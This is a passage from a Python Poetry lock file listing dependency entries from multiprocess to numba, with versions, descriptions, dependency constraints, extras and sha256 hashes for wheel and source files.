"sha256:20e024018c46d0d1602024c613007ac948f9754659e3853b0aa705e83f6931d8"}, {file = "multiprocess-0.70.15-pp37-pypy37_pp73-manylinux_2_24_i686.whl", hash = "sha256:e576062981c91f0fe8a463c3d52506e598dfc51320a8dd8d78b987dfca91c5db"}, {file = "multiprocess-0.70.15-pp37-pypy37_pp73-manylinux_2_24_x86_64.whl", hash = "sha256:e73f497e6696a0f5433ada2b3d599ae733b87a6e8b008e387c62ac9127add177"}, {file = "multiprocess-0.70.15-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:73db2e7b32dcc7f9b0f075c2ffa45c90b6729d3f1805f27e88534c8d321a1be5"}, {file = "multiprocess-0.70.15-pp38-pypy38_pp73-manylinux_2_24_i686.whl", hash = "sha256:4271647bd8a49c28ecd6eb56a7fdbd3c212c45529ad5303b40b3c65fc6928e5f"}, {file = "multiprocess-0.70.15-pp38-pypy38_pp73-manylinux_2_24_x86_64.whl", hash = "sha256:cf981fb998d6ec3208cb14f0cf2e9e80216e834f5d51fd09ebc937c32b960902"}, {file = "multiprocess-0.70.15-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:18f9f2c7063346d1617bd1684fdcae8d33380ae96b99427260f562e1a1228b67"}, {file = "multiprocess-0.70.15-pp39-pypy39_pp73-manylinux_2_24_i686.whl", hash = "sha256:0eac53214d664c49a34695e5824872db4006b1a465edd7459a251809c3773370"}, {file = "multiprocess-0.70.15-pp39-pypy39_pp73-manylinux_2_24_x86_64.whl", hash = "sha256:1a51dd34096db47fb21fa2b839e615b051d51b97af9a67afbcdaa67186b44883"}, {file = "multiprocess-0.70.15-py310-none-any.whl", hash = "sha256:7dd58e33235e83cf09d625e55cffd7b0f0eede7ee9223cdd666a87624f60c21a"}, {file = "multiprocess-0.70.15-py311-none-any.whl", hash = "sha256:134f89053d82c9ed3b73edd3a2531eb791e602d4f4156fc92a79259590bd9670"}, {file = "multiprocess-0.70.15-py37-none-any.whl", hash = 
"sha256:f7d4a1629bccb433114c3b4885f69eccc200994323c80f6feee73b0edc9199c5"}, {file = "multiprocess-0.70.15-py38-none-any.whl", hash = "sha256:bee9afba476c91f9ebee7beeee0601face9eff67d822e893f9a893725fbd6316"}, {file = "multiprocess-0.70.15-py39-none-any.whl", hash = "sha256:3e0953f5d52b4c76f1c973eaf8214554d146f2be5decb48e928e55c7a2d19338"}, {file = "multiprocess-0.70.15.tar.gz", hash = "sha256:f20eed3036c0ef477b07a4177cf7c1ba520d9a2677870a4f47fe026f0cd6787e"}, ] [package.dependencies] dill = ">=0.3.7" [[package]] name = "mwcli" version = "0.0.3" description = "Utilities for processing MediaWiki on the command line." optional = true python-versions = "*" files = [ {file = "mwcli-0.0.3-py2.py3-none-any.whl", hash = "sha256:24a7e53730e6fa7e55626e4f2a61a0b016d5e0a9798306c1d8c71bcead0ab239"}, {file = "mwcli-0.0.3.tar.gz", hash = "sha256:00331bd0ff16b5721c9c6274d91e25fd355f45ec0773c8a0e3926eac058719a0"}, ] [package.dependencies] docopt = "*" mwxml = "*" para = "*" [[package]] name = "mwparserfromhell" version = "0.6.5" description = "MWParserFromHell is a parser for MediaWiki wikicode." optional = true python-versions = ">= 3.7" files = [ {file = "mwparserfromhell-0.6.5-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:b3a941ea35fc4fb49fc8d9087490ee8d94e09fb8e08b3bca83fc99cb4577bb81"}, {file = "mwparserfromhell-0.6.5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a3b27580eebda2685ab5e54381df0845f13acb8ca7d50f754378184756e13bf"}, {file = "mwparserfromhell-0.6.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6169f314d6c28f0f373b5b2b346c51058248c8897493ed7c490db7caa65ea729"}, {file = "mwparserfromhell-0.6.5-cp310-cp310-win32.whl", hash = "sha256:b60e575e1e5c17a2e316b12a143de04665c4b1189a61a3a534967d33b57394cd"}, {file = "mwparserfromhell-0.6.5-cp310-cp310-win_amd64.whl", hash = "sha256:30747186171f6c58858c04eb617dd82dff2ae06d6f9e1b94714698daa32bc664"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:837e6adf0963ddf5317f789541ea109108515ccd2405cd1437ff8224294c3fa7"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3a3ba57207582de52345e69187218bd35cf3675497fd383bc70e46c0c728d50f"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7984215a21b0778b90724643df24e8dbb89aecb95af2ba56a42a1956fcbeb571"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-win32.whl", hash = "sha256:0c055324ad12c80f1ee2175c1d1b29b997aab57f6010174e704de15fdcb1757b"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-win_amd64.whl", hash = "sha256:f252f09c4bf5432bd91a6aa79c707753ff084454cb24f8b513187531d5f6295f"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-macosx_11_0_x86_64.whl", hash = "sha256:61d1e01cc027fe3d94c7d3620cb6ea9648305795a66bb93747d418a15c0d1860"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4932d27cd3f00b451579c97c31e45d1e236b643bb93eeddde8d4aca50d87e3e6"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:51e56993b7a351a44bdb9af7abbb72f3383fcb46f69e556f6116397598f6f3bb"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-win32.whl", hash = "sha256:eb1afb65e5b8a0e3eba35644347cd5304c6e7803571db042850dc0697bbe49a3"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-win_amd64.whl", hash = "sha256:05b8262dc13c83e023ea6d17e5e5bcef225c2c172621c71cad947958afbaf4e4"}, {file = 
"mwparserfromhell-0.6.5-cp38-cp38-macosx_11_0_x86_64.whl", hash = "sha256:7408b3ce5f0b328e86be3809e906fc378767ef5396565b7411963452ad3bbf12"}, {file = "mwparserfromhell-0.6.5-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1660c5558cd9a32b3e72c0e3aabdd6729a013d8e1b5695d4bdb478f691d9657e"}, {file = "mwparserfromhell-0.6.5-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b205ce558596c35eacec863b3c88e9081872aa56b471ffd4f54162480d75f8d1"}, {file = "mwparserfromhell-0.6.5-cp38-cp38-win32.whl", hash = "sha256:b09a62cac76ae0cb0daef309a93ecc23d3fbcd8e68a646517c6ac8479c4cc5fe"}, {file = "mwparserfromhell-0.6.5-cp38-cp38-win_amd64.whl", hash = "sha256:2ecc86c6b29354adb472553bf982b6bd05fd21ac41c44d454d2aac06ca456163"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:76234df2d138542ae839bebe53d4e4f59b286d0287101f54d1b84d9d193d5848"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b5be5f476bf4077bfc6fefcb3ccb21900f63b36c09ef0bb63667e21f09be2198"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8b4d5e87d2b405eb493f86a3f0e513d4e2c30edde6b8d3b4f7d2a53ffac5d81a"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-win32.whl", hash = "sha256:7f6e5505014d0e97e29bc01304e8f6a8d782dec55c53492cc7ca03d2a6d1e445"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-win_amd64.whl", hash = "sha256:153243177c4c242880e9c4547880e834f01d04625ad0bc175693255dfb22dae5"}, {file = "mwparserfromhell-0.6.5.tar.gz", hash = "sha256:2bad0bff614576399e4470d6400ba29c52d595682a4b8de642afbb5bebf4a346"}, ] [[package]] name = "mwtypes" version = "0.3.2" description = "A set of types for processing MediaWiki data." optional = true python-versions = "*" files = [ {file = "mwtypes-0.3.2-py2.py3-none-any.whl", hash = "sha256:d6f3cae90eea4c88bc260101c8a082fb0ab22cca88e7474657b28cd9538794f3"}, {file = "mwtypes-0.3.2.tar.gz", hash = "sha256:dc1176c5965629c123e859b319ae6151d4e385531e9a781604c0d4ca3434e399"}, ] [package.dependencies] jsonable = ">=0.3.0" [[package]] name = "mwxml" version = "0.3.3" description = "A set of utilities for processing MediaWiki XML dump data." 
optional = true python-versions = "*" files = [ {file = "mwxml-0.3.3-py2.py3-none-any.whl", hash = "sha256:9695848b8b6987b6f6addc2a8accba5b2bcbc543702598194e182b508ab568a9"}, {file = "mwxml-0.3.3.tar.gz", hash = "sha256:0848df0cf2e293718f554311acf4715bd679f639f4e52cbe47d8206589db1d31"}, ] [package.dependencies] jsonschema = ">=2.5.1" mwcli = ">=0.0.2" mwtypes = ">=0.3.0" para = ">=0.0.1" [[package]] name = "mypy" version = "0.991" description = "Optional static typing for Python" optional = false python-versions = ">=3.7" files = [ {file = "mypy-0.991-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:7d17e0a9707d0772f4a7b878f04b4fd11f6f5bcb9b3813975a9b13c9332153ab"}, {file = "mypy-0.991-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0714258640194d75677e86c786e80ccf294972cc76885d3ebbb560f11db0003d"}, {file = "mypy-0.991-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:0c8f3be99e8a8bd403caa8c03be619544bc2c77a7093685dcf308c6b109426c6"}, {file = "mypy-0.991-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bc9ec663ed6c8f15f4ae9d3c04c989b744436c16d26580eaa760ae9dd5d662eb"}, {file = "mypy-0.991-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:4307270436fd7694b41f913eb09210faff27ea4979ecbcd849e57d2da2f65305"}, {file = "mypy-0.991-cp310-cp310-win_amd64.whl", hash = "sha256:901c2c269c616e6cb0998b33d4adbb4a6af0ac4ce5cd078afd7bc95830e62c1c"}, {file = "mypy-0.991-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:d13674f3fb73805ba0c45eb6c0c3053d218aa1f7abead6e446d474529aafc372"}, {file = "mypy-0.991-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:1c8cd4fb70e8584ca1ed5805cbc7c017a3d1a29fb450621089ffed3e99d1857f"}, {file = "mypy-0.991-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:209ee89fbb0deed518605edddd234af80506aec932ad28d73c08f1400ef80a33"}, {file = "mypy-0.991-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:37bd02ebf9d10e05b00d71302d2c2e6ca333e6c2a8584a98c00e038db8121f05"}, {file = "mypy-0.991-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:26efb2fcc6b67e4d5a55561f39176821d2adf88f2745ddc72751b7890f3194ad"}, {file = "mypy-0.991-cp311-cp311-win_amd64.whl", hash = "sha256:3a700330b567114b673cf8ee7388e949f843b356a73b5ab22dd7cff4742a5297"}, {file = "mypy-0.991-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:1f7d1a520373e2272b10796c3ff721ea1a0712288cafaa95931e66aa15798813"}, {file = "mypy-0.991-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:641411733b127c3e0dab94c45af15fea99e4468f99ac88b39efb1ad677da5711"}, {file = "mypy-0.991-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:3d80e36b7d7a9259b740be6d8d906221789b0d836201af4234093cae89ced0cd"}, {file = "mypy-0.991-cp37-cp37m-win_amd64.whl", hash = "sha256:e62ebaad93be3ad1a828a11e90f0e76f15449371ffeecca4a0a0b9adc99abcef"}, {file = "mypy-0.991-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:b86ce2c1866a748c0f6faca5232059f881cda6dda2a893b9a8373353cfe3715a"}, {file = "mypy-0.991-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ac6e503823143464538efda0e8e356d871557ef60ccd38f8824a4257acc18d93"}, {file = "mypy-0.991-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:0cca5adf694af539aeaa6ac633a7afe9bbd760df9d31be55ab780b77ab5ae8bf"}, {file = "mypy-0.991-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a12c56bf73cdab116df96e4ff39610b92a348cc99a1307e1da3c3768bbb5b135"}, {file = "mypy-0.991-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:652b651d42f155033a1967739788c436491b577b6a44e4c39fb340d0ee7f0d70"}, 
{file = "mypy-0.991-cp38-cp38-win_amd64.whl", hash = "sha256:4175593dc25d9da12f7de8de873a33f9b2b8bdb4e827a7cae952e5b1a342e243"}, {file = "mypy-0.991-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:98e781cd35c0acf33eb0295e8b9c55cdbef64fcb35f6d3aa2186f289bed6e80d"}, {file = "mypy-0.991-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6d7464bac72a85cb3491c7e92b5b62f3dcccb8af26826257760a552a5e244aa5"}, {file = "mypy-0.991-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:c9166b3f81a10cdf9b49f2d594b21b31adadb3d5e9db9b834866c3258b695be3"}, {file = "mypy-0.991-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8472f736a5bfb159a5e36740847808f6f5b659960115ff29c7cecec1741c648"}, {file = "mypy-0.991-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5e80e758243b97b618cdf22004beb09e8a2de1af481382e4d84bc52152d1c476"}, {file = "mypy-0.991-cp39-cp39-win_amd64.whl", hash = "sha256:74e259b5c19f70d35fcc1ad3d56499065c601dfe94ff67ae48b85596b9ec1461"}, {file = "mypy-0.991-py3-none-any.whl", hash = "sha256:de32edc9b0a7e67c2775e574cb061a537660e51210fbf6006b0b36ea695ae9bb"}, {file = "mypy-0.991.tar.gz", hash = "sha256:3c0165ba8f354a6d9881809ef29f1a9318a236a6d81c690094c5df32107bde06"}, ] [package.dependencies] mypy-extensions = ">=0.4.3" tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""} typing-extensions = ">=3.10" [package.extras] dmypy = ["psutil (>=4.0)"] install-types = ["pip"] python2 = ["typed-ast (>=1.4.0,<2)"] reports = ["lxml"] [[package]] name = "mypy-extensions" version = "1.0.0" description = "Type system extensions for programs checked with the mypy type checker." optional = false python-versions = ">=3.5" files = [ {file = "mypy_extensions-1.0.0-py3-none-any.whl", hash = "sha256:4392f6c0eb8a5668a69e23d168ffa70f0be9ccfd32b5cc2d26a34ae5b844552d"}, {file = "mypy_extensions-1.0.0.tar.gz", hash = "sha256:75dbf8955dc00442a438fc4d0666508a9a97b6bd41aa2f0ffe9d2f2725af0782"}, ] [[package]] name = "mypy-protobuf" version = "3.3.0" description = "Generate mypy stub files from protobuf specs" optional = false python-versions = ">=3.7" files = [ {file = "mypy-protobuf-3.3.0.tar.gz", hash = "sha256:24f3b0aecb06656e983f58e07c732a90577b9d7af3e1066fc2b663bbf0370248"}, {file = "mypy_protobuf-3.3.0-py3-none-any.whl", hash = "sha256:15604f6943b16c05db646903261e3b3e775cf7f7990b7c37b03d043a907b650d"}, ] [package.dependencies] protobuf = ">=3.19.4" types-protobuf = ">=3.19.12" [[package]] name = "nbclient" version = "0.8.0" description = "A client library for executing notebooks. Formerly nbconvert's ExecutePreprocessor." 
optional = false python-versions = ">=3.8.0" files = [ {file = "nbclient-0.8.0-py3-none-any.whl", hash = "sha256:25e861299e5303a0477568557c4045eccc7a34c17fc08e7959558707b9ebe548"}, {file = "nbclient-0.8.0.tar.gz", hash = "sha256:f9b179cd4b2d7bca965f900a2ebf0db4a12ebff2f36a711cb66861e4ae158e55"}, ] [package.dependencies] jupyter-client = ">=6.1.12" jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" nbformat = ">=5.1" traitlets = ">=5.4" [package.extras] dev = ["pre-commit"] docs = ["autodoc-traits", "mock", "moto", "myst-parser", "nbclient[test]", "sphinx (>=1.7)", "sphinx-book-theme", "sphinxcontrib-spelling"] test = ["flaky", "ipykernel (>=6.19.3)", "ipython", "ipywidgets", "nbconvert (>=7.0.0)", "pytest (>=7.0)", "pytest-asyncio", "pytest-cov (>=4.0)", "testpath", "xmltodict"] [[package]] name = "nbconvert" version = "7.9.2" description = "Converting Jupyter Notebooks" optional = false python-versions = ">=3.8" files = [ {file = "nbconvert-7.9.2-py3-none-any.whl", hash = "sha256:39fe4b8bdd1b0104fdd86fc8a43a9077ba64c720bda4c6132690d917a0a154ee"}, {file = "nbconvert-7.9.2.tar.gz", hash = "sha256:e56cc7588acc4f93e2bb5a34ec69028e4941797b2bfaf6462f18a41d1cc258c9"}, ] [package.dependencies] beautifulsoup4 = "*" bleach = "!=5.0.0" defusedxml = "*" importlib-metadata = {version = ">=3.6", markers = "python_version < \"3.10\""} jinja2 = ">=3.0" jupyter-core = ">=4.7" jupyterlab-pygments = "*" markupsafe = ">=2.0" mistune = ">=2.0.3,<4" nbclient = ">=0.5.0" nbformat = ">=5.7" packaging = "*" pandocfilters = ">=1.4.1" pygments = ">=2.4.1" tinycss2 = "*" traitlets = ">=5.1" [package.extras] all = ["nbconvert[docs,qtpdf,serve,test,webpdf]"] docs = ["ipykernel", "ipython", "myst-parser", "nbsphinx (>=0.2.12)", "pydata-sphinx-theme", "sphinx (==5.0.2)", "sphinxcontrib-spelling"] qtpdf = ["nbconvert[qtpng]"] qtpng = ["pyqtwebengine (>=5.15)"] serve = ["tornado (>=6.1)"] test = ["flaky", "ipykernel", "ipywidgets (>=7)", "pytest", "pytest-dependency"] webpdf = ["playwright"] [[package]] name = "nbformat" version = "5.9.2" description = "The Jupyter Notebook format" optional = false python-versions = ">=3.8" files = [ {file = "nbformat-5.9.2-py3-none-any.whl", hash = "sha256:1c5172d786a41b82bcfd0c23f9e6b6f072e8fb49c39250219e4acfff1efe89e9"}, {file = "nbformat-5.9.2.tar.gz", hash = "sha256:5f98b5ba1997dff175e77e0c17d5c10a96eaed2cbd1de3533d1fc35d5e111192"}, ] [package.dependencies] fastjsonschema = "*" jsonschema = ">=2.6" jupyter-core = "*" traitlets = ">=5.1" [package.extras] docs = ["myst-parser", "pydata-sphinx-theme", "sphinx", "sphinxcontrib-github-alt", "sphinxcontrib-spelling"] test = ["pep440", "pre-commit", "pytest", "testpath"] [[package]] name = "nebula3-python" version = "3.4.0" description = "Python client for NebulaGraph V3.4" optional = true python-versions = "*" files = [ {file = "nebula3-python-3.4.0.tar.gz", hash = "sha256:47bd8b1b4bb2c2f0e5122bc147926cb50578a66841acf6a743cae4d0362c9eaa"}, {file = "nebula3_python-3.4.0-py3-none-any.whl", hash = "sha256:d9d94c6a41712875e6ec866907de0789057f860e64f547f87d9f199439759dd6"}, ] [package.dependencies] future = ">=0.18.0" httplib2 = ">=0.20.0" pytz = ">=2021.1" six = ">=1.16.0" [[package]] name = "neo4j" version = "5.14.0" description = "Neo4j Bolt driver for Python" optional = true python-versions = ">=3.7" files = [ {file = "neo4j-5.14.0.tar.gz", hash = "sha256:6040efca47126c01385f09e550fb7d7671b1853a1e1c34908aa3713cebd285da"}, ] [package.dependencies] pytz = "*" [package.extras] numpy = ["numpy (>=1.7.0,<2.0.0)"] pandas = ["numpy (>=1.7.0,<2.0.0)", 
"pandas (>=1.1.0,<3.0.0)"] pyarrow = ["pyarrow (>=1.0.0)"] [[package]] name = "nest-asyncio" version = "1.5.8" description = "Patch asyncio to allow nested event loops" optional = false python-versions = ">=3.5" files = [ {file = "nest_asyncio-1.5.8-py3-none-any.whl", hash = "sha256:accda7a339a70599cb08f9dd09a67e0c2ef8d8d6f4c07f96ab203f2ae254e48d"}, {file = "nest_asyncio-1.5.8.tar.gz", hash = "sha256:25aa2ca0d2a5b5531956b9e273b45cf664cae2b145101d73b86b199978d48fdb"}, ] [[package]] name = "networkx" version = "3.1" description = "Python package for creating and manipulating graphs and networks" optional = true python-versions = ">=3.8" files = [ {file = "networkx-3.1-py3-none-any.whl", hash = "sha256:4f33f68cb2afcf86f28a45f43efc27a9386b535d567d2127f8f61d51dec58d36"}, {file = "networkx-3.1.tar.gz", hash = "sha256:de346335408f84de0eada6ff9fafafff9bcda11f0a0dfaa931133debb146ab61"}, ] [package.extras] default = ["matplotlib (>=3.4)", "numpy (>=1.20)", "pandas (>=1.3)", "scipy (>=1.8)"] developer = ["mypy (>=1.1)", "pre-commit (>=3.2)"] doc = ["nb2plots (>=0.6)", "numpydoc (>=1.5)", "pillow (>=9.4)", "pydata-sphinx-theme (>=0.13)", "sphinx (>=6.1)", "sphinx-gallery (>=0.12)", "texext (>=0.6.7)"] extra = ["lxml (>=4.6)", "pydot (>=1.4.2)", "pygraphviz (>=1.10)", "sympy (>=1.10)"] test = ["codecov (>=2.1)", "pytest (>=7.2)", "pytest-cov (>=4.0)"] [[package]] name = "newspaper3k" version = "0.2.8" description = "Simplified python article discovery & extraction." optional = true python-versions = "*" files = [ {file = "newspaper3k-0.2.8-py3-none-any.whl", hash = "sha256:44a864222633d3081113d1030615991c3dbba87239f6bbf59d91240f71a22e3e"}, {file = "newspaper3k-0.2.8.tar.gz", hash = "sha256:9f1bd3e1fb48f400c715abf875cc7b0a67b7ddcd87f50c9aeeb8fcbbbd9004fb"}, ] [package.dependencies] beautifulsoup4 = ">=4.4.1" cssselect = ">=0.9.2" feedfinder2 = ">=0.0.4" feedparser = ">=5.2.1" jieba3k = ">=0.35.1" lxml = ">=3.6.0" nltk = ">=3.2.1" Pillow = ">=3.3.0" python-dateutil = ">=2.5.3" PyYAML = ">=3.11" requests = ">=2.10.0" tinysegmenter = "0.3" tldextract = ">=2.0.1" [[package]] name = "nlpcloud" version = "1.1.44" description = "Python client for the NLP Cloud API" optional = true python-versions = "*" files = [ {file = "nlpcloud-1.1.44-py3-none-any.whl", hash = "sha256:ca05fe9d6bd7def583b4202b63ca423234c5b921e2ced5a20e9a0020619dc4c5"}, {file = "nlpcloud-1.1.44.tar.gz", hash = "sha256:74e5bf33d1492620a28b8fa5649e8f8366c0752a6e978251b7361d23b56025b3"}, ] [package.dependencies] requests = "*" [[package]] name = "nltk" version = "3.8.1" description = "Natural Language Toolkit" optional = true python-versions = ">=3.7" files = [ {file = "nltk-3.8.1-py3-none-any.whl", hash = "sha256:fd5c9109f976fa86bcadba8f91e47f5e9293bd034474752e92a520f81c93dda5"}, {file = "nltk-3.8.1.zip", hash = "sha256:1834da3d0682cba4f2cede2f9aad6b0fafb6461ba451db0efb6f9c39798d64d3"}, ] [package.dependencies] click = "*" joblib = "*" regex = ">=2021.8.3" tqdm = "*" [package.extras] all = ["matplotlib", "numpy", "pyparsing", "python-crfsuite", "requests", "scikit-learn", "scipy", "twython"] corenlp = ["requests"] machine-learning = ["numpy", "python-crfsuite", "scikit-learn", "scipy"] plot = ["matplotlib"] tgrep = ["pyparsing"] twitter = ["twython"] [[package]] name = "nomic" version = "1.1.14" description = "The offical Nomic python client." 
optional = true python-versions = "*" files = [ {file = "nomic-1.1.14.tar.gz", hash = "sha256:7980516131a125988cea47d7390063d90a9f5bdc6d6063574b6bfbb9897a7202"}, ] [package.dependencies] click = "*" cohere = "*" jsonlines = "*" loguru = "*" numpy = "*" pyarrow = "*" pydantic = "*" requests = "*" rich = "*" tqdm = "*" wonderwords = "*" [package.extras] dev = ["black", "cairosvg", "coverage", "mkautodoc", "mkdocs-jupyter", "mkdocs-material", "mkdocstrings[python]", "myst-parser", "pillow", "pylint", "pytest", "twine"] gpt4all = ["peft (==0.3.0.dev0)", "sentencepiece", "torch", "transformers (==4.28.0.dev0)"] [[package]] name = "notebook" version = "7.0.6" description = "Jupyter Notebook - A web-based notebook environment for interactive computing" optional = false python-versions = ">=3.8" files = [ {file = "notebook-7.0.6-py3-none-any.whl", hash = "sha256:0fe8f67102fea3744fedf652e4c15339390902ca70c5a31c4f547fa23da697cc"}, {file = "notebook-7.0.6.tar.gz", hash = "sha256:ec6113b06529019f7f287819af06c97a2baf7a95ac21a8f6e32192898e9f9a58"}, ] [package.dependencies] jupyter-server = ">=2.4.0,<3" jupyterlab = ">=4.0.2,<5" jupyterlab-server = ">=2.22.1,<3" notebook-shim = ">=0.2,<0.3" tornado = ">=6.2.0" [package.extras] dev = ["hatch", "pre-commit"] docs = ["myst-parser", "nbsphinx", "pydata-sphinx-theme", "sphinx (>=1.3.6)", "sphinxcontrib-github-alt", "sphinxcontrib-spelling"] test = ["importlib-resources (>=5.0)", "ipykernel", "jupyter-server[test] (>=2.4.0,<3)", "jupyterlab-server[test] (>=2.22.1,<3)", "nbval", "pytest (>=7.0)", "pytest-console-scripts", "pytest-timeout", "pytest-tornasync", "requests"] [[package]] name = "notebook-shim" version = "0.2.3" description = "A shim layer for notebook traits and config" optional = false python-versions = ">=3.7" files = [ {file = "notebook_shim-0.2.3-py3-none-any.whl", hash = "sha256:a83496a43341c1674b093bfcebf0fe8e74cbe7eda5fd2bbc56f8e39e1486c0c7"}, {file = "notebook_shim-0.2.3.tar.gz", hash = "sha256:f69388ac283ae008cd506dda10d0288b09a017d822d5e8c7129a152cbd3ce7e9"}, ] [package.dependencies] jupyter-server = ">=1.8,<3" [package.extras] test = ["pytest", "pytest-console-scripts", "pytest-jupyter", "pytest-tornasync"] [[package]] name = "numba" version = "0.58.1" description = "compiling Python code using LLVM" optional = true python-versions = ">=3.8" files = [ {file = "numba-0.58.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:07f2fa7e7144aa6f275f27260e73ce0d808d3c62b30cff8906ad1dec12d87bbe"}, {file = "numba-0.58.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:7bf1ddd4f7b9c2306de0384bf3854cac3edd7b4d8dffae2ec1b925e4c436233f"}, {file = "numba-0.58.1-cp310-cp310-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:bc2d904d0319d7a5857bd65062340bed627f5bfe9ae4a495aef342f072880d50"}, {file = "numba-0.58.1-cp310-cp310-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:4e79b6cc0d2bf064a955934a2e02bf676bc7995ab2db929dbbc62e4c16551be6"}, {file = "numba-0.58.1-cp310-cp310-win_amd64.whl", hash = "sha256:81fe5b51532478149b5081311b0fd4206959174e660c372b94ed5364cfb37c82"}, {file = "numba-0.58.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:bcecd3fb9df36554b342140a4d77d938a549be635d64caf8bd9ef6c47a47f8aa"}, {file = "numba-0.58.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:a1eaa744f518bbd60e1f7ccddfb8002b3d06bd865b94a5d7eac25028efe0e0ff"}, {file = "numba-0.58.1-cp311-cp311-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:bf68df9c307fb0aa81cacd33faccd6e419496fdc621e83f1efce35cdc5e79cac"}, {file = 
"numba-0.58.1-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:55a01e1881120e86d54efdff1be08381886fe9f04fc3006af309c602a72bc44d"}, {file = "numba-0.58.1-cp311-cp311-win_amd64.whl", hash = "sha256:811305d5dc40ae43c3ace5b192c670c358a89a4d2ae4f86d1665003798ea7a1a"}, {file = "numba-0.58.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ea5bfcf7d641d351c6a80e8e1826eb4a145d619870016eeaf20bbd71ef5caa22"}, {file = "numba-0.58.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e63d6aacaae1ba4ef3695f1c2122b30fa3d8ba039c8f517784668075856d79e2"}, {file = "numba-0.58.1-cp38-cp38-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:6fe7a9d8e3bd996fbe5eac0683227ccef26cba98dae6e5cee2c1894d4b9f16c1"}, {file = "numba-0.58.1-cp38-cp38-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:898af055b03f09d33a587e9425500e5be84fc90cd2f80b3fb71c6a4a17a7e354"}, {file = "numba-0.58.1-cp38-cp38-win_amd64.whl", hash = "sha256:d3e2fe81fe9a59fcd99cc572002101119059d64d31eb6324995ee8b0f144a306"}, {file = "numba-0.58.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5c765aef472a9406a97ea9782116335ad4f9ef5c9f93fc05fd44aab0db486954"}, {file = "numba-0.58.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9e9356e943617f5e35a74bf56ff6e7cc83e6b1865d5e13cee535d79bf2cae954"}, {file = "numba-0.58.1-cp39-cp39-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:240e7a1ae80eb6b14061dc91263b99dc8d6af9ea45d310751b780888097c1aaa"}, {file = "numba-0.58.1-cp39-cp39-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:45698b995914003f890ad839cfc909eeb9c74921849c712a05405d1a79c50f68"}, {file = "numba-0.58.1-cp39-cp39-win_amd64.whl", hash = "sha256:bd3dda77955be03ff366eebbfdb39919ce7c2620d86c906203bed92124989032"}, {file = 